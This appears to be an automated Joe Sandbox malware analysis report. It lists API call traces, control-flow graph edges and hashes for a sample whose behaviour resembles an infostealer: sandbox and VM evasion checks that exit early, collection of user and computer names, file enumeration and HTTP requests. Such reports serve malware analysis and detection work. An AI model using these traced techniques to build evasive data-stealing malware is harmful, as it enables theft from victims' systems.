7e0902-7e091d 1400->1408 1401->1395 1402->1397 1409 7e056f-7e057a 1403->1409 1410 7e056d 1403->1410 1404->1380 1411 7e068f-7e06b2 1405->1411 1412 7e0750-7e077a 1405->1412 1406->1389 1413 7e083e-7e0847 1406->1413 1407->1408 1414 7e057c-7e0599 1409->1414 1415 7e059b-7e05bb 1409->1415 1410->1404 1416 7e06ef-7e06fc 1411->1416 1417 7e06b4-7e06ed 1411->1417 1412->1388 1418 7e084b-7e086c 1413->1418 1419 7e0849 1413->1419 1427 7e05bd-7e05db 1414->1427 1415->1427 1421 7e06fe-7e0748 1416->1421 1422 7e074b 1416->1422 1417->1416 1418->1406 1419->1389 1421->1422 1422->1405 1427->1398
                                    APIs
                                    • VirtualAlloc.KERNEL32(00000000,?,00001000,00000004), ref: 007E024D
                                    Strings
                                    Memory Dump Source
                                    • Source File: 00000000.00000002.2312211700.00000000007E0000.00000040.00001000.00020000.00000000.sdmp, Offset: 007E0000, based on PE: false
                                    Joe Sandbox IDA Plugin
                                    • Snapshot File: hcaresult_0_2_7e0000_ttFpxuMwKz.jbxd
                                    Yara matches
                                    Similarity
                                    • API ID: AllocVirtual
                                    • String ID: cess$kernel32.dll
                                    • API String ID: 4275171209-1230238691
                                    • Opcode ID: aaa6c488ea091c11cf1d14b1b8159415dd1a008d9b857f0942c425a8c5fa1e0a
                                    • Instruction ID: 16dd53b31e236c2b8353203991b07fb74fcb2fe72e53336b0df64afbb24c18c3
                                    • Opcode Fuzzy Hash: aaa6c488ea091c11cf1d14b1b8159415dd1a008d9b857f0942c425a8c5fa1e0a
                                    • Instruction Fuzzy Hash: 87528874A01269DFDB64CF69C984BA8BBB1BF09304F1480D9E90DAB351DB74AE94DF10

                                    Control-flow Graph

                                    APIs
                                      • Part of subcall function 00419860: GetProcAddress.KERNEL32(75900000,009E7E58), ref: 004198A1
                                      • Part of subcall function 00419860: GetProcAddress.KERNEL32(75900000,009E7E70), ref: 004198BA
                                      • Part of subcall function 00419860: GetProcAddress.KERNEL32(75900000,009E7EE8), ref: 004198D2
                                      • Part of subcall function 00419860: GetProcAddress.KERNEL32(75900000,009E7EB8), ref: 004198EA
                                      • Part of subcall function 00419860: GetProcAddress.KERNEL32(75900000,009E7ED0), ref: 00419903
                                      • Part of subcall function 00419860: GetProcAddress.KERNEL32(75900000,009E4F10), ref: 0041991B
                                      • Part of subcall function 00419860: GetProcAddress.KERNEL32(75900000,009E45A8), ref: 00419933
                                      • Part of subcall function 00419860: GetProcAddress.KERNEL32(75900000,009E45E8), ref: 0041994C
                                      • Part of subcall function 00419860: GetProcAddress.KERNEL32(75900000,009E7F00), ref: 00419964
                                      • Part of subcall function 00419860: GetProcAddress.KERNEL32(75900000,009E7F18), ref: 0041997C
                                      • Part of subcall function 00419860: GetProcAddress.KERNEL32(75900000,00A12950), ref: 00419995
                                      • Part of subcall function 00419860: GetProcAddress.KERNEL32(75900000,00A12B90), ref: 004199AD
                                      • Part of subcall function 00419860: GetProcAddress.KERNEL32(75900000,009E42C8), ref: 004199C5
                                      • Part of subcall function 00419860: GetProcAddress.KERNEL32(75900000,00A12A70), ref: 004199DE
                                      • Part of subcall function 0041A740: lstrcpy.KERNEL32(B,00000000), ref: 0041A788
                                      • Part of subcall function 004011D0: ExitProcess.KERNEL32 ref: 00401211
                                      • Part of subcall function 00401160: GetSystemInfo.KERNEL32(?,?,?,?,?,?,?,?,?,00416A17,00420AEF), ref: 0040116A
                                      • Part of subcall function 00401160: ExitProcess.KERNEL32 ref: 0040117E
                                      • Part of subcall function 00401110: GetCurrentProcess.KERNEL32(00000000,000007D0,00003000,00000040,00000000,?,?,00416A1C), ref: 0040112B
                                      • Part of subcall function 00401110: VirtualAllocExNuma.KERNEL32(00000000,?,?,00416A1C), ref: 00401132
                                      • Part of subcall function 00401110: ExitProcess.KERNEL32 ref: 00401143
                                      • Part of subcall function 00401220: GlobalMemoryStatusEx.KERNEL32(00000040,?,00000000,00000040), ref: 0040123E
                                      • Part of subcall function 00401220: __aulldiv.LIBCMT ref: 00401258
                                      • Part of subcall function 00401220: __aulldiv.LIBCMT ref: 00401266
                                      • Part of subcall function 00401220: ExitProcess.KERNEL32 ref: 00401294
                                      • Part of subcall function 00416770: GetUserDefaultLangID.KERNEL32(?,?,00416A26,00420AEF), ref: 00416774
                                    • GetUserDefaultLCID.KERNEL32 ref: 00416A26
                                      • Part of subcall function 00401190: ExitProcess.KERNEL32 ref: 004011C6
                                      • Part of subcall function 00417850: GetProcessHeap.KERNEL32(00000000,00000104,?,?,?,004011B7), ref: 00417880
                                      • Part of subcall function 00417850: HeapAlloc.KERNEL32(00000000,?,?,?,004011B7), ref: 00417887
                                      • Part of subcall function 00417850: GetUserNameA.ADVAPI32(00000104,00000104), ref: 0041789F
                                      • Part of subcall function 004178E0: GetProcessHeap.KERNEL32(00000000,00000104,?,?,?,00416A2B), ref: 00417910
                                      • Part of subcall function 004178E0: HeapAlloc.KERNEL32(00000000,?,?,?,00416A2B), ref: 00417917
                                      • Part of subcall function 004178E0: GetComputerNameA.KERNEL32(?,00000104), ref: 0041792F
                                      • Part of subcall function 0041A9B0: lstrlenA.KERNEL32(?,00421110,?,00000000,00420AEF), ref: 0041A9C5
                                      • Part of subcall function 0041A9B0: lstrcpy.KERNEL32(00000000), ref: 0041AA04
                                      • Part of subcall function 0041A9B0: lstrcatA.KERNEL32(00000000,00000000), ref: 0041AA12
                                      • Part of subcall function 0041A8A0: lstrcpy.KERNEL32(?,B), ref: 0041A905
                                    • OpenEventA.KERNEL32(001F0003,00000000,00000000,00000000,?,00A12D90,?,0042110C,?,00000000,?,00421110,?,00000000,00420AEF), ref: 00416ACA
                                    • CreateEventA.KERNEL32(00000000,00000000,00000000,00000000), ref: 00416AE8
                                    • CloseHandle.KERNEL32(00000000), ref: 00416AF9
                                    • Sleep.KERNEL32(00001770), ref: 00416B04
                                    • CloseHandle.KERNEL32(?,00000000,?,00A12D90,?,0042110C,?,00000000,?,00421110,?,00000000,00420AEF), ref: 00416B1A
                                    • ExitProcess.KERNEL32 ref: 00416B22
                                    Memory Dump Source
                                    • Source File: 00000000.00000002.2312038691.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                    • Associated: 00000000.00000002.2312038691.00000000004B1000.00000040.00000001.01000000.00000003.sdmp
                                    • Associated: 00000000.00000002.2312038691.00000000004BD000.00000040.00000001.01000000.00000003.sdmp
                                    • Associated: 00000000.00000002.2312038691.00000000004E2000.00000040.00000001.01000000.00000003.sdmp
                                    • Associated: 00000000.00000002.2312038691.000000000064A000.00000040.00000001.01000000.00000003.sdmp
                                    • Associated: 00000000.00000002.2312038691.000000000065C000.00000040.00000001.01000000.00000003.sdmp
                                    Joe Sandbox IDA Plugin
                                    • Snapshot File: hcaresult_0_2_400000_ttFpxuMwKz.jbxd
                                    Yara matches
                                    Similarity
                                    • API ID: AddressProc$Process$Exit$Heap$AllocUserlstrcpy$CloseDefaultEventHandleName__aulldiv$ComputerCreateCurrentGlobalInfoLangMemoryNumaOpenSleepStatusSystemVirtuallstrcatlstrlen
                                    • String ID:
                                    • API String ID: 3511611419-0
                                    • Opcode ID: f2837a91539e1de850f1597d3128a2fe060ecc5e52c57b00c57f058d9a125bb9
                                    • Instruction ID: 1c0ff58a553566d9d81a636820be0d4cb73d0efe44d476221655ae408a7450da
                                    • Opcode Fuzzy Hash: f2837a91539e1de850f1597d3128a2fe060ecc5e52c57b00c57f058d9a125bb9
                                    • Instruction Fuzzy Hash: E1317074940208AADB04FBF2DC56BEE7339AF04344F10042EF102A61D2DF7C6986C6AE

                                    Control-flow Graph

                                    APIs
                                    • ??2@YAPAXI@Z.MSVCRT(00000800), ref: 004047EA
                                    • ??2@YAPAXI@Z.MSVCRT(00000800), ref: 00404801
                                    • ??2@YAPAXI@Z.MSVCRT(00000800), ref: 00404818
                                    • lstrlenA.KERNEL32(00000000,00000000,0000003C), ref: 00404839
                                    • InternetCrackUrlA.WININET(00000000,00000000), ref: 00404849
                                    Strings
                                    Memory Dump Source
                                    • Source File: 00000000.00000002.2312038691.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                    • Associated: 00000000.00000002.2312038691.00000000004B1000.00000040.00000001.01000000.00000003.sdmp
                                    • Associated: 00000000.00000002.2312038691.00000000004BD000.00000040.00000001.01000000.00000003.sdmp
                                    • Associated: 00000000.00000002.2312038691.00000000004E2000.00000040.00000001.01000000.00000003.sdmp
                                    • Associated: 00000000.00000002.2312038691.000000000064A000.00000040.00000001.01000000.00000003.sdmp
                                    • Associated: 00000000.00000002.2312038691.000000000065C000.00000040.00000001.01000000.00000003.sdmp
                                    Joe Sandbox IDA Plugin
                                    • Snapshot File: hcaresult_0_2_400000_ttFpxuMwKz.jbxd
                                    Yara matches
                                    Similarity
                                    • API ID: ??2@$CrackInternetlstrlen
                                    • String ID: <
                                    • API String ID: 1683549937-4251816714
                                    • Opcode ID: 5e0eba31b208d9ca9ca69f5ca1b4b8635b9982c67c18271d081340b0a416118e
                                    • Instruction ID: 59ffd934fb977a93d501bba2862ecb1df6a0defd032b503e5e890a78b3955a81
                                    • Opcode Fuzzy Hash: 5e0eba31b208d9ca9ca69f5ca1b4b8635b9982c67c18271d081340b0a416118e
                                    • Instruction Fuzzy Hash: 712149B5D00219ABDF10DFA5E849BDD7B74FF04320F008229F925A7290EB706A15CF95

                                    Control-flow Graph

                                    • Executed
                                    • Not Executed
                                    control_flow_graph 1493 401220-401247 call 4189b0 GlobalMemoryStatusEx 1496 401273-40127a 1493->1496 1497 401249-401271 call 41da00 * 2 1493->1497 1498 401281-401285 1496->1498 1497->1498 1500 401287 1498->1500 1501 40129a-40129d 1498->1501 1503 401292-401294 ExitProcess 1500->1503 1504 401289-401290 1500->1504 1504->1501 1504->1503
                                    APIs
                                    • GlobalMemoryStatusEx.KERNEL32(00000040,?,00000000,00000040), ref: 0040123E
                                    • __aulldiv.LIBCMT ref: 00401258
                                    • __aulldiv.LIBCMT ref: 00401266
                                    • ExitProcess.KERNEL32 ref: 00401294
                                    Strings
                                    Memory Dump Source
                                    • Source File: 00000000.00000002.2312038691.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                    • Associated: 00000000.00000002.2312038691.00000000004B1000.00000040.00000001.01000000.00000003.sdmp
                                    • Associated: 00000000.00000002.2312038691.00000000004BD000.00000040.00000001.01000000.00000003.sdmp
                                    • Associated: 00000000.00000002.2312038691.00000000004E2000.00000040.00000001.01000000.00000003.sdmp
                                    • Associated: 00000000.00000002.2312038691.000000000064A000.00000040.00000001.01000000.00000003.sdmp
                                    • Associated: 00000000.00000002.2312038691.000000000065C000.00000040.00000001.01000000.00000003.sdmp
                                    Joe Sandbox IDA Plugin
                                    • Snapshot File: hcaresult_0_2_400000_ttFpxuMwKz.jbxd
                                    Yara matches
                                    Similarity
                                    • API ID: __aulldiv$ExitGlobalMemoryProcessStatus
                                    • String ID: @
                                    • API String ID: 3404098578-2766056989
                                    • Opcode ID: e3d9931386e0fa91028f4e7641da7fda79c4023127bcc5196728e9d9e144d5c4
                                    • Instruction ID: f2ded3d157cb35307e0b39d430c96622be3dd75f8d5744ac0086d878f352425a
                                    • Opcode Fuzzy Hash: e3d9931386e0fa91028f4e7641da7fda79c4023127bcc5196728e9d9e144d5c4
                                    • Instruction Fuzzy Hash: 5901FBB0D84308BAEB10DBE4DC49B9EBB78AB15705F20809EE705B62D0D6785585879D

                                    Control-flow Graph

                                    • Executed
                                    • Not Executed
                                    control_flow_graph 1507 416af3 1508 416b0a 1507->1508 1510 416aba-416ad7 call 41aad0 OpenEventA 1508->1510 1511 416b0c-416b22 call 416920 call 415b10 CloseHandle ExitProcess 1508->1511 1517 416af5-416b04 CloseHandle Sleep 1510->1517 1518 416ad9-416af1 call 41aad0 CreateEventA 1510->1518 1517->1508 1518->1511
                                    APIs
                                    • OpenEventA.KERNEL32(001F0003,00000000,00000000,00000000,?,00A12D90,?,0042110C,?,00000000,?,00421110,?,00000000,00420AEF), ref: 00416ACA
                                    • CreateEventA.KERNEL32(00000000,00000000,00000000,00000000), ref: 00416AE8
                                    • CloseHandle.KERNEL32(00000000), ref: 00416AF9
                                    • Sleep.KERNEL32(00001770), ref: 00416B04
                                    • CloseHandle.KERNEL32(?,00000000,?,00A12D90,?,0042110C,?,00000000,?,00421110,?,00000000,00420AEF), ref: 00416B1A
                                    • ExitProcess.KERNEL32 ref: 00416B22
                                    Memory Dump Source
                                    • Source File: 00000000.00000002.2312038691.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                    • Associated: 00000000.00000002.2312038691.00000000004B1000.00000040.00000001.01000000.00000003.sdmp
                                    • Associated: 00000000.00000002.2312038691.00000000004BD000.00000040.00000001.01000000.00000003.sdmp
                                    • Associated: 00000000.00000002.2312038691.00000000004E2000.00000040.00000001.01000000.00000003.sdmp
                                    • Associated: 00000000.00000002.2312038691.000000000064A000.00000040.00000001.01000000.00000003.sdmp
                                    • Associated: 00000000.00000002.2312038691.000000000065C000.00000040.00000001.01000000.00000003.sdmp
                                    Joe Sandbox IDA Plugin
                                    • Snapshot File: hcaresult_0_2_400000_ttFpxuMwKz.jbxd
                                    Yara matches
                                    Similarity
                                    • API ID: CloseEventHandle$CreateExitOpenProcessSleep
                                    • String ID:
                                    • API String ID: 941982115-0
                                    • Opcode ID: 7c87040c747da0acdc92787bbe7dfdf8e9b0063e40ee03b256faf14453658583
                                    • Instruction ID: 3c4b1c3760862ff095f4b16c882d5da3ff279df4080b6ba6633acb61265b60b7
                                    • Opcode Fuzzy Hash: 7c87040c747da0acdc92787bbe7dfdf8e9b0063e40ee03b256faf14453658583
                                    • Instruction Fuzzy Hash: E9F0BE34A84219AFE710EBE0DC06BFE7B35EF04381F11451AF502A11C0CBB8A581D65F
                                    APIs
                                      • Part of subcall function 0041A7A0: lstrcpy.KERNEL32(?,00000000), ref: 0041A7E6
                                      • Part of subcall function 00406280: InternetOpenA.WININET(00420DFE,00000001,00000000,00000000,00000000), ref: 004062E1
                                      • Part of subcall function 00406280: StrCmpCA.SHLWAPI(?,00A1B398), ref: 00406303
                                      • Part of subcall function 00406280: InternetConnectA.WININET(00000000,?,?,00000000,00000000,00000003,00000000,00000000), ref: 00406335
                                      • Part of subcall function 00406280: HttpOpenRequestA.WININET(00000000,GET,?,00A1A780,00000000,00000000,00400100,00000000), ref: 00406385
                                      • Part of subcall function 00406280: InternetSetOptionA.WININET(00000000,0000001F,?,00000004), ref: 004063BF
                                      • Part of subcall function 00406280: HttpSendRequestA.WININET(00000000,00000000,00000000,00000000,00000000), ref: 004063D1
                                    • StrCmpCA.SHLWAPI(00000000,ERROR), ref: 00415228
                                    Strings
                                    Memory Dump Source
                                    • Source File: 00000000.00000002.2312038691.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                    • Associated: 00000000.00000002.2312038691.00000000004B1000.00000040.00000001.01000000.00000003.sdmp
                                    • Associated: 00000000.00000002.2312038691.00000000004BD000.00000040.00000001.01000000.00000003.sdmp
                                    • Associated: 00000000.00000002.2312038691.00000000004E2000.00000040.00000001.01000000.00000003.sdmp
                                    • Associated: 00000000.00000002.2312038691.000000000064A000.00000040.00000001.01000000.00000003.sdmp
                                    • Associated: 00000000.00000002.2312038691.000000000065C000.00000040.00000001.01000000.00000003.sdmp
                                    Joe Sandbox IDA Plugin
                                    • Snapshot File: hcaresult_0_2_400000_ttFpxuMwKz.jbxd
                                    Yara matches
                                    Similarity
                                    • API ID: Internet$HttpOpenRequest$ConnectOptionSendlstrcpy
                                    • String ID: ERROR$ERROR
                                    • API String ID: 3287882509-2579291623
                                    • Opcode ID: 59c2f712046978f996f1235e97a4a9c2f26ee25370e317b3bcc87c900f09e2b2
                                    • Instruction ID: 74302943fe5589af4790b43ef38c2dd3b69765dcd24c28c5b90e35499643ece9
                                    • Opcode Fuzzy Hash: 59c2f712046978f996f1235e97a4a9c2f26ee25370e317b3bcc87c900f09e2b2
                                    • Instruction Fuzzy Hash: 2D113330901008ABCB14FF61DD52AED7338AF50354F90416EF81A5A5D2EF38AB56CA9A
                                    APIs
                                    • GetProcessHeap.KERNEL32(00000000,00000104,?,?,?,00416A2B), ref: 00417910
                                    • HeapAlloc.KERNEL32(00000000,?,?,?,00416A2B), ref: 00417917
                                    • GetComputerNameA.KERNEL32(?,00000104), ref: 0041792F
                                    Memory Dump Source
                                    • Source File: 00000000.00000002.2312038691.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                     • Associated: 00000000.00000002.2312038691.00000000004B1000.00000040.00000001.01000000.00000003.sdmp
                                     • Associated: 00000000.00000002.2312038691.00000000004BD000.00000040.00000001.01000000.00000003.sdmp
                                     • Associated: 00000000.00000002.2312038691.00000000004E2000.00000040.00000001.01000000.00000003.sdmp
                                     • Associated: 00000000.00000002.2312038691.000000000064A000.00000040.00000001.01000000.00000003.sdmp
                                     • Associated: 00000000.00000002.2312038691.000000000065C000.00000040.00000001.01000000.00000003.sdmp
                                    Joe Sandbox IDA Plugin
                                    • Snapshot File: hcaresult_0_2_400000_ttFpxuMwKz.jbxd
                                    Yara matches
                                    Similarity
                                    • API ID: Heap$AllocComputerNameProcess
                                    • String ID:
                                    • API String ID: 4203777966-0
                                    • Opcode ID: 655548885853275668edecfa1cfdfba2d4285fba1d09bdc7eb36c2d1d55ec877
                                    • Instruction ID: 452d18c19ae851532a1d010ea63a4611fd0250a2e86211d30d2d96ca9096ca29
                                    • Opcode Fuzzy Hash: 655548885853275668edecfa1cfdfba2d4285fba1d09bdc7eb36c2d1d55ec877
                                    • Instruction Fuzzy Hash: 220186F1A48204EFD700DF94DD45BAABBB8FB05B11F10425AF545E3280C37859448BA6
                                    APIs
                                    • GetCurrentProcess.KERNEL32(00000000,000007D0,00003000,00000040,00000000,?,?,00416A1C), ref: 0040112B
                                    • VirtualAllocExNuma.KERNEL32(00000000,?,?,00416A1C), ref: 00401132
                                    • ExitProcess.KERNEL32 ref: 00401143
                                    Memory Dump Source
                                    • Source File: 00000000.00000002.2312038691.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                     • Associated: 00000000.00000002.2312038691.00000000004B1000.00000040.00000001.01000000.00000003.sdmp
                                     • Associated: 00000000.00000002.2312038691.00000000004BD000.00000040.00000001.01000000.00000003.sdmp
                                     • Associated: 00000000.00000002.2312038691.00000000004E2000.00000040.00000001.01000000.00000003.sdmp
                                     • Associated: 00000000.00000002.2312038691.000000000064A000.00000040.00000001.01000000.00000003.sdmp
                                     • Associated: 00000000.00000002.2312038691.000000000065C000.00000040.00000001.01000000.00000003.sdmp
                                    Joe Sandbox IDA Plugin
                                    • Snapshot File: hcaresult_0_2_400000_ttFpxuMwKz.jbxd
                                    Yara matches
                                    Similarity
                                    • API ID: Process$AllocCurrentExitNumaVirtual
                                    • String ID:
                                    • API String ID: 1103761159-0
                                    • Opcode ID: 3cbd8cc13bf7dc70ab035dff78f9dd202cda3002ce084c09b8f89ce2de56700b
                                    • Instruction ID: 516f97497d3ee46bc55051264f2a31c9d8efacdbd59bd60d04d859dfb32d17c4
                                    • Opcode Fuzzy Hash: 3cbd8cc13bf7dc70ab035dff78f9dd202cda3002ce084c09b8f89ce2de56700b
                                    • Instruction Fuzzy Hash: 76E08674985308FFE7106BE09C0AB0976B9EB05B05F101055F7087A1D0C6B826009699
                                    APIs
                                    • CreateToolhelp32Snapshot.KERNEL32(00000008,00000000), ref: 009E9FF6
                                    • Module32First.KERNEL32(00000000,00000224), ref: 009EA016
                                    Memory Dump Source
                                    • Source File: 00000000.00000002.2312343251.00000000009E9000.00000040.00000020.00020000.00000000.sdmp, Offset: 009E9000, based on PE: false
                                    Joe Sandbox IDA Plugin
                                    • Snapshot File: hcaresult_0_2_9e9000_ttFpxuMwKz.jbxd
                                    Yara matches
                                    Similarity
                                    • API ID: CreateFirstModule32SnapshotToolhelp32
                                    • String ID:
                                    • API String ID: 3833638111-0
                                    • Opcode ID: 3788706d20f5b898e185810e19a2e38a50b9b544ac306a9cd33eedd6d527d18a
                                    • Instruction ID: bc5e972dc53f9bd94111de105fca02d42543bb3ead558db78aae40f726567df2
                                    • Opcode Fuzzy Hash: 3788706d20f5b898e185810e19a2e38a50b9b544ac306a9cd33eedd6d527d18a
                                    • Instruction Fuzzy Hash: B4F09632100751BBD7213BF6988DBAEB6ECAF49725F100529E656D10C0DBB0FC454A61
                                    APIs
                                    • SetErrorMode.KERNEL32(00000400,?,?,007E0223,?,?), ref: 007E0E19
                                    • SetErrorMode.KERNEL32(00000000,?,?,007E0223,?,?), ref: 007E0E1E
                                    Memory Dump Source
                                    • Source File: 00000000.00000002.2312211700.00000000007E0000.00000040.00001000.00020000.00000000.sdmp, Offset: 007E0000, based on PE: false
                                    Joe Sandbox IDA Plugin
                                    • Snapshot File: hcaresult_0_2_7e0000_ttFpxuMwKz.jbxd
                                    Yara matches
                                    Similarity
                                    • API ID: ErrorMode
                                    • String ID:
                                    • API String ID: 2340568224-0
                                    • Opcode ID: 027e3930a8fc815aeaa48c4a19c17906f2e2d358c6b73c72f02d274321b10a64
                                    • Instruction ID: 7a55b1bb0ad5a630dcb172cb140b2a30c45defdff20bc49bbe57137cadadddd3
                                    • Opcode Fuzzy Hash: 027e3930a8fc815aeaa48c4a19c17906f2e2d358c6b73c72f02d274321b10a64
                                    • Instruction Fuzzy Hash: 4CD0123114512877D7003A95DC09BCD7B1CDF09B62F008421FB0DD9080C7B4994046E5
                                    APIs
                                    • VirtualAlloc.KERNEL32(00000000,17C841C0,00003000,00000004,?,?,?,0040114E,?,?,00416A1C), ref: 004010B3
                                    • VirtualFree.KERNEL32(00000000,17C841C0,00008000,00000000,05E69EC0,?,?,?,0040114E,?,?,00416A1C), ref: 004010F7
                                    Memory Dump Source
                                    • Source File: 00000000.00000002.2312038691.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                     • Associated: 00000000.00000002.2312038691.00000000004B1000.00000040.00000001.01000000.00000003.sdmp
                                     • Associated: 00000000.00000002.2312038691.00000000004BD000.00000040.00000001.01000000.00000003.sdmp
                                     • Associated: 00000000.00000002.2312038691.00000000004E2000.00000040.00000001.01000000.00000003.sdmp
                                     • Associated: 00000000.00000002.2312038691.000000000064A000.00000040.00000001.01000000.00000003.sdmp
                                     • Associated: 00000000.00000002.2312038691.000000000065C000.00000040.00000001.01000000.00000003.sdmp
                                    Joe Sandbox IDA Plugin
                                    • Snapshot File: hcaresult_0_2_400000_ttFpxuMwKz.jbxd
                                    Yara matches
                                    Similarity
                                    • API ID: Virtual$AllocFree
                                    • String ID:
                                    • API String ID: 2087232378-0
                                    • Opcode ID: 8ce35272a596f1cdf5aa55b7e6bb44489e409ba54c945097ad2cb9ba566d6231
                                    • Instruction ID: e05e9ea69c75ff17789b13d2c0695db9e8f3777892ad192db41722de5b6306ee
                                    • Opcode Fuzzy Hash: 8ce35272a596f1cdf5aa55b7e6bb44489e409ba54c945097ad2cb9ba566d6231
                                    • Instruction Fuzzy Hash: F2F052B1681208BBE7109BA4AC49FABB3E8E305B14F301408F500E3380C5319E00CAA4
                                    APIs
                                      • Part of subcall function 004178E0: GetProcessHeap.KERNEL32(00000000,00000104,?,?,?,00416A2B), ref: 00417910
                                      • Part of subcall function 004178E0: HeapAlloc.KERNEL32(00000000,?,?,?,00416A2B), ref: 00417917
                                      • Part of subcall function 004178E0: GetComputerNameA.KERNEL32(?,00000104), ref: 0041792F
                                      • Part of subcall function 00417850: GetProcessHeap.KERNEL32(00000000,00000104,?,?,?,004011B7), ref: 00417880
                                      • Part of subcall function 00417850: HeapAlloc.KERNEL32(00000000,?,?,?,004011B7), ref: 00417887
                                      • Part of subcall function 00417850: GetUserNameA.ADVAPI32(00000104,00000104), ref: 0041789F
                                    • ExitProcess.KERNEL32 ref: 004011C6
                                    Memory Dump Source
                                    • Source File: 00000000.00000002.2312038691.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                     • Associated: 00000000.00000002.2312038691.00000000004B1000.00000040.00000001.01000000.00000003.sdmp
                                     • Associated: 00000000.00000002.2312038691.00000000004BD000.00000040.00000001.01000000.00000003.sdmp
                                     • Associated: 00000000.00000002.2312038691.00000000004E2000.00000040.00000001.01000000.00000003.sdmp
                                     • Associated: 00000000.00000002.2312038691.000000000064A000.00000040.00000001.01000000.00000003.sdmp
                                     • Associated: 00000000.00000002.2312038691.000000000065C000.00000040.00000001.01000000.00000003.sdmp
                                    Joe Sandbox IDA Plugin
                                    • Snapshot File: hcaresult_0_2_400000_ttFpxuMwKz.jbxd
                                    Yara matches
                                    Similarity
                                    • API ID: Heap$Process$AllocName$ComputerExitUser
                                    • String ID:
                                    • API String ID: 1004333139-0
                                    • Opcode ID: beae5ea4bba28d8bcdb6621297b085ccf5731606b7c52db2eb8bbe7634c0c08e
                                    • Instruction ID: 3272f285758621328f1ae990cc0b7bdad84480bea6fe4891c0ce75a2ed71569b
                                    • Opcode Fuzzy Hash: beae5ea4bba28d8bcdb6621297b085ccf5731606b7c52db2eb8bbe7634c0c08e
                                    • Instruction Fuzzy Hash: 72E0C2B999030123DB0433F2AD0AB6B329D5B0538DF04042EFA08D2252FE2CE84085AE
                                    APIs
                                    • VirtualAlloc.KERNEL32(00000000,?,00001000,00000040), ref: 009E9CDE
                                    Memory Dump Source
                                    • Source File: 00000000.00000002.2312343251.00000000009E9000.00000040.00000020.00020000.00000000.sdmp, Offset: 009E9000, based on PE: false
                                    Joe Sandbox IDA Plugin
                                    • Snapshot File: hcaresult_0_2_9e9000_ttFpxuMwKz.jbxd
                                    Yara matches
                                    Similarity
                                    • API ID: AllocVirtual
                                    • String ID:
                                    • API String ID: 4275171209-0
                                    • Opcode ID: 499270a49480bde3a93b1541ef130abcc6c407f96609cce36d97d57e1d2ec7bb
                                    • Instruction ID: 6e024fccda4761e7647706d31abedc0c3617590f79dd60c0f223e7f5874c58d0
                                    • Opcode Fuzzy Hash: 499270a49480bde3a93b1541ef130abcc6c407f96609cce36d97d57e1d2ec7bb
                                    • Instruction Fuzzy Hash: 59112B79A00208EFDB01DF99C985E98BBF5AF08351F158094F9489B362D371EE90DB80
                                    APIs
                                    • wsprintfA.USER32 ref: 004138CC
                                    • FindFirstFileA.KERNEL32(?,?), ref: 004138E3
                                    • lstrcatA.KERNEL32(?,?,?,00000104,?,00000104), ref: 00413935
                                    • StrCmpCA.SHLWAPI(?,00420F70), ref: 00413947
                                    • StrCmpCA.SHLWAPI(?,00420F74), ref: 0041395D
                                    • FindNextFileA.KERNEL32(000000FF,?), ref: 00413C67
                                    • FindClose.KERNEL32(000000FF), ref: 00413C7C
                                    Strings
                                    Memory Dump Source
                                    • Source File: 00000000.00000002.2312038691.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                     • Associated: 00000000.00000002.2312038691.00000000004B1000.00000040.00000001.01000000.00000003.sdmp
                                     • Associated: 00000000.00000002.2312038691.00000000004BD000.00000040.00000001.01000000.00000003.sdmp
                                     • Associated: 00000000.00000002.2312038691.00000000004E2000.00000040.00000001.01000000.00000003.sdmp
                                     • Associated: 00000000.00000002.2312038691.000000000064A000.00000040.00000001.01000000.00000003.sdmp
                                     • Associated: 00000000.00000002.2312038691.000000000065C000.00000040.00000001.01000000.00000003.sdmp
                                    Joe Sandbox IDA Plugin
                                    • Snapshot File: hcaresult_0_2_400000_ttFpxuMwKz.jbxd
                                    Yara matches
                                    Similarity
                                    • API ID: Find$File$CloseFirstNextlstrcatwsprintf
                                    • String ID: !=A$%s%s$%s\%s$%s\%s$%s\%s\%s$%s\*
                                    • API String ID: 1125553467-817767981
                                    • Opcode ID: 147e69476bc17354b056f5ce00ba28a25639a4ba897131371b79271fd6134482
                                    • Instruction ID: 6b32dcbabd2ae606338a05af88a65253e6d0136fcb4401239c8972690a9ca057
                                    • Opcode Fuzzy Hash: 147e69476bc17354b056f5ce00ba28a25639a4ba897131371b79271fd6134482
                                    • Instruction Fuzzy Hash: 45A182B5A40218ABDB20DFA4DC85FEA7379BF45301F04458DB50D96181EB789B84CF66
                                    APIs
                                      • Part of subcall function 0041A740: lstrcpy.KERNEL32(B,00000000), ref: 0041A788
                                      • Part of subcall function 0041A920: lstrcpy.KERNEL32(00000000,?), ref: 0041A972
                                      • Part of subcall function 0041A920: lstrcatA.KERNEL32(00000000), ref: 0041A982
                                      • Part of subcall function 0041A9B0: lstrlenA.KERNEL32(?,00421110,?,00000000,00420AEF), ref: 0041A9C5
                                      • Part of subcall function 0041A9B0: lstrcpy.KERNEL32(00000000), ref: 0041AA04
                                      • Part of subcall function 0041A9B0: lstrcatA.KERNEL32(00000000,00000000), ref: 0041AA12
                                      • Part of subcall function 0041A8A0: lstrcpy.KERNEL32(?,B), ref: 0041A905
                                    • FindFirstFileA.KERNEL32(00000000,?,00420B32,00420B2B,00000000,?,?,?,004213F4,00420B2A), ref: 0040BEF5
                                    • StrCmpCA.SHLWAPI(?,004213F8), ref: 0040BF4D
                                    • StrCmpCA.SHLWAPI(?,004213FC), ref: 0040BF63
                                    • FindNextFileA.KERNEL32(000000FF,?), ref: 0040C7BF
                                    • FindClose.KERNEL32(000000FF), ref: 0040C7D1
                                    Strings
                                    Memory Dump Source
                                    • Source File: 00000000.00000002.2312038691.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                     • Associated: 00000000.00000002.2312038691.00000000004B1000.00000040.00000001.01000000.00000003.sdmp
